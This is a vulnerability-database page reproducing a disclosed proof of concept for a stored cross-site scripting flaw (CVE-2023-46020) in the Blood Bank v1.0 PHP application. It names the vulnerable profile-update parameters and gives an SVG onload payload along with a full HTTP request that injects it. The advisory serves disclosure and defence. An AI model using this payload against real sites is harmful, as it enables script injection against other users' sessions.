Vulners
Lucene search
Blood Bank v1.0 - Stored Cross Site Scripting (XSS)
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | CVE-2023-46020 | 13 Nov 202323:15 | – | attackerkb |
 | Exploit for Cross-site Scripting in Code-Projects Blood_Bank | 11 Nov 202308:37 | – | githubexploit |
 | Code-Projects Blood Bank Cross-Site Scripting Vulnerability | 13 Nov 202300:00 | – | cnnvd |
 | CVE-2023-46020 | 13 Nov 202300:00 | – | cve |
 | CVE-2023-46020 | 13 Nov 202300:00 | – | cvelist |
 | EUVD-2023-50282 | 3 Oct 202520:07 | – | euvd |
 | CVE-2023-46020 | 13 Nov 202323:15 | – | nvd |
 | CVE-2023-46020 | 13 Nov 202323:15 | – | osv |
 | Blood Bank 1.0 Cross Site Scripting | 2 Apr 202400:00 | – | packetstorm |
 | Cross site scripting | 13 Nov 202323:15 | – | prion |
10
# Exploit Title: Blood Bank v1.0 Stored Cross Site Scripting (XSS)
# Date: 2023-11-14
# Exploit Author: Ersin Erenler
# Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code
# Software Link: https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip
# Version: 1.0
# Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0
# CVE : CVE-2023-46020
-------------------------------------------------------------------------------
# Description:
The parameters rename, remail, rphone, and rcity in the /file/updateprofile.php file of Code-Projects Blood Bank V1.0 are susceptible to Stored Cross-Site Scripting (XSS). This vulnerability arises due to insufficient input validation and sanitation of user-supplied data. An attacker can exploit this weakness by injecting malicious scripts into these parameters, which, when stored on the server, may be executed when other users view the affected user's profile.
Vulnerable File: updateprofile.php
Parameters: rename, remail, rphone, rcity
# Proof of Concept:
----------------------
1. Intercept the POST request to updateprofile.php via Burp Suite
2. Inject the payload to the vulnerable parameters
3. Payload: "><svg/onload=alert(document.domain)>
4. Example request for rname parameter:
---
POST /bloodbank/file/updateprofile.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 103
Origin: http://localhost
Connection: close
Referer: http://localhost/bloodbank/rprofile.php?id=1
Cookie: PHPSESSID=<some-cookie-value>
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
rname=test"><svg/onload=alert(document.domain)>&remail=test%40gmail.com&rpassword=test&rphone=8875643456&rcity=lucknow&bg=A%2B&update=Update
----
5. Go to the profile page and trigger the XSS
XSS Payload:
"><svg/onload=alert(document.domain)>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Apr 2024 00:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 3.16.1
EPSS0.00127
SSVC